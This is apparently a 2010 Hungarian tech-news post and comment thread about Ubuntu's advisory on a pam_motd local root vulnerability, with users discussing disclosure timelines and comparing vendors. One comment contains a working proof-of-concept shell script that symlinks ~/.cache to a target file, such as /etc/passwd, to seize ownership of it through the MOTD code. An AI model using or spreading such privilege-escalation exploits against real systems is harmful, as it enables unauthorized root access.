Local root sebezhetőséget javított az Ubuntu

Ubuntu

Az Ubuntu részéről Kees Cook postázott tegnap egy biztonsági figyelmeztetőt, amelyben arról tájékoztatja a felhasználókat, hogy az Ubuntu 9.10 és 10.04 LTS olyan, a pam_motd-ban található hibát tartalmaz, amely a helyi támadót root jogokhoz juttathatja. A javítás már elkészült. Aki nem frissít rendszeresen, annak érdemes a frissítést mielőbb megejteni. A hiba más disztribúciókat nem érint. A bejelentés itt olvasható.

( nikin v | 2010. 07. 08., cs – 13:52 )

Érdekes kontraszt ez az MS reagálása után ;)

### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb

OK ok. csak felmerült, hogy nem tudjuk mióta ismert... gondoltam próbálok valamiből következtetni... és akkor ezek szerint elmondhatjuk, hogy a CVE kiadásának pillanatában (Márc 03) Már ismert volt. Tehát a minimális gap a megtalálás és a javítás között 4 hónap.

### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb

Gondolom igen... De őszintén nem hiszem, hogy az ubinál bárki picsogott volna ha publikálják a hibát... sőt szerintem akkor gyorsabban is javították volna.

Az MS reakciója nekem nem ott problémás, hogy több idő kell a javításhoz, meg ilyenek, hanem ott hogy picsognak.

### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb

Szívesen fogadok linkeket ilyen oldalakra.

"csak ezek nem kerülnek be a huphírekbe, ki tudja miért "

Csak elmondod majd a rögeszmédet. Illetve csak megmagyarázod, hogy itthon miért lehet ezen az oldalon az elmúlt 10 évre visszamenőleg szinte minden linuxos sebezhetőségről olvasni.

--
trey @ gépház

Lehet nem olvastad a szálat: nem sebezhetőségekről volt szó, hanem az ilyen-olyan spurned hülyegyerekek jerk-off attention-whore kollektíváiról, elnézést, M$-killer szuperhősökről, illetve ezek binuzos ellenpárjairól.

[ "Security people are leaches!" - Linus T. ] [ hupexpertize© || hupdiploma ]

Az első tagmondatra egyértelműen a hup.hu ugrik be, ezt lehet ismered. A másodikra adok linket, majd ha vettem a fáradtságot az nginx elindítására, addigis ajánlanám a gplhuszar.com-ot, de már nem megy ;) Marad a http://linuxhaters.blogspot.com/, már az első három posztban több érdekes, hasznos és olvasmányos infót találtam, mint a hupon mondjuk az elmúlt két hónap alatt :) Nem kritika, ide másért járunk.

[ "Security people are leaches!" - Linus T. ] [ hupexpertize© || hupdiploma ]

Legyen... akkoriban még nem Linuxoztam. Szóval jól elhiszem. És közben reménykedem hogy most már abbahagyják az ubinál az új elemek behelyezését, és fordítanak időt az összecsiszolásra.

### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb

( foofighter | 2010. 07. 08., cs – 17:04 )

Milyen egyszerű. 


if [ $# -eq 0 ]; then
    echo "Usage: $0 /path/to/file"
    exit 1
fi
 
mkdir $HOME/backup 2> /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2> /dev/null
echo "\n@@@ File before tampering ...\n"
ls -l $1
ln -sf $1 $HOME/.cache
echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :)  File will then be owned by your user.  Try /etc/passwd...\n"

( Zahy v | 2010. 07. 08., cs – 19:34 )

Nem vagyok up-to-date, de a motd megjelenitesehez mi a francnak pam modul????

( akkos v | 2010. 07. 10., szo – 11:41 )

"Az ubuntu biztonságos"

Jajj. büfiztem :)